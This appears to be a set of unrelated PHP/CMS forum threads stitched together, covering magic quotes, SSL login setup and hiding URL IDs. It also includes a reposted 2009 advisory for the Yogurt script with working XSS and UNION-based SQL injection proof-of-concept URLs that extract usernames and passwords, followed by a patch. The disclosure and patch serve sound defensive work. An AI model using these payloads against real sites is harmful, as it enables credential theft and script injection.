Just found that my server has magic quotes enabled. I've been looking at data sanitisation and validation lately, and my books pretty much say 'magic quotes are evil turn them off'.
Which is fine if the software (think modules) you are running properly escape and validate data, but as we know sometimes they don't.
So what to do - leave it on, or turn it off? What do you do?
of course it is, but regarding the "ssl login feature" the only encryptet thig is the logincredentials.
if your serversettings say that there is only one folder(httpdocs) for secure and "insercure" connection, than you can simply change the physicalpath in your trustpath mainfile. then you can access the site via https. other option is to maybe clone your whole site and put it directly into the httpsdocs folder. then, you settings must respond to this as well, hence to search in the httpsdocs folder when entering the site via https.
there might be one thing that prevents you from running your site in ssl only. google if u use any kind of googlemaps service on your site, u mustn do that on a sll site, if you wan to, it need a mapspro account that costs approx 10k usd( ) per year.
this is a real issue when you want gmaps and for example a shop on your same site install. oledrion should have the feature to run it in ssl mode only while everything else uses just http, that would be fine but: if you have a ssl certificate, a bought one i mean, then you might be unpleased that on a mixed system(http and https at same physical location) your users get a warning that not every content is encrptet.
on the other hand, when you have a ssl site and dont mind googles rules, you may get away with a browserwarning that there is non encryptet content embedded in your ssl site because the maps api you get for free connects via non encrypted line.
its kinda dillema.
bye
Hmm...is it possible to have my whole site in SSL? Or does this only do the login?
yes you can
but: if your hosting setup says that there is only one folder(the httpdocs) for ssl and non ssl connections, then you should put the ssl loginfile into a exclusive folder within your documentroot, hence, a foulder without anything else in it. otherwise, you browser may come up with the panic notice that the connection is encryptet but that there are other unencryptet files.
if your ssl place is the httpsdocs documentroot and you physically reach this directory when typing https in your browser, then you can put the loginfile wherever you want.
i hope this is 100% correct. i tried it, but maybe there are possible differences i dont know about.
bye!
Thanks. Can I put the ssl directory in the web root for my site, or is it meant to sit outside the web root (like the trust path does)?
hi!
no, there is one single file you have to put to your ssl encryptet place. example: http://www.xyz.com/ is your normal sites place. the ssl loginfile might reside in https://www.xyz.com
you find the file you need in the extras folder when you uncompress the icms install package.
hope this helps
bye!
Just setting up a new site and thought, why not use the SSL login for a change. But I'm not clear on how it works:
Quote:
URL where SSL login page is located: https://
Quote:
system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);
Quote:
patch sql injection C:\AppServ\www\yogurt\system\writemessage.php (2 hits) Line 79:
if (isset($_GET['original'])) Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db)############### change ################ Line 81:$rs = mysql_query("SELECT * FROM messages WHERE id=" . intval($_GET['original']), $db)
Have you tested this on the profile module included in ImpressCMS 1.2 alpha? I remember having fixed all these in it
Dear lostmon,
thanks for info. We will fix this.
patch sql injection
C:\AppServ\www\yogurt\system\writemessage.php (2 hits)
Line 79: if (isset($_GET['original']))
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db)
###############
change
################
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . intval($_GET['original']), $db)
Thank you Marcello
tomorrow i look to install and patch it
i donĀ“t test it in ImpressCMS but , anyway i look for patch it tommorrow.
------------------------------------------------------------------
Name : Yogurt
Site : http://sourceforge.net/projects/yogurt/
Down : http://sourceforge.net/project/showfiles.php?group_id=112452&package_id=141123&release_id=297459
Dork : "Yogurt build"
------------------------------------------------------------------
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
------------------------------------------------------------------
Description:
Bug : XSS
In index.php:
index.php:45: if(isset($_GET['msg']))
index.php:48: print("<center>". $_GET['msg'] . "</center>"); <-- XSS VUL
BUG : SQL INJECTION
system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);
In neither case was the method _GET filtered properly.
Others .phps also contains the failures I'm posting the first one I found .. ^^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
P0c:
XSS : http://localhost/xscripts/yogurt/index.php?msg=<script>alert('br0ly')</script>
First: Go to: http://localhost/yogurt/newuser.php, after register, just login and you can explore the sqli.
SQLi :
http://localhost/yogurt/system/writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users--
OBS: need register_globals=on;
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# milw0rm.com [2009-06-11]
I suppose adding more security checks is some of the counter measures I will take, perhaps in addition to encyrpting it.
I was afraid you'd say mod_rewrite - it's a tough piece to implement.
I had considered POST - but thought it could not be done if it were part of the dynamic row - a button on every row with a hidden variable perhaps....?
Thanks guys for the feedback!
Is exposing these variables really a problem?
I mean, it doesn't matter if a user manipulates this variable as long as you verify its integrity in the server.
For example, stop processing if the variable is not a number. If it's not a number and your code has no bugs, you can bet it has been manipulated.
Don't use it as a URL parameter, use it as a post parameter for a form
Whenever a dynamic grid-list is built, we always dereference the ID for that row and pass it to the next page like:
"<a href='client.php?uid=".$uid."\">client</a>"
Exposing these ids can be a security problem - what are your suggestions for hiding this information. So far I have seen:
1. Apache redirect [a little beyond me at this point....]
2. $uid = base64_encode($uid) [seems reasonable....]
Appreciate the feedback!
Found two articles in Sitepoint regarding the subject. WOrth reading.
http://www.sitepoint.com/blogs/2009/05/10/googles-new-capcha-the-only-way-is-up/#comment-925430
http://www.sitepoint.com/blogs/2009/05/11/avoid-captchas/#comment-925431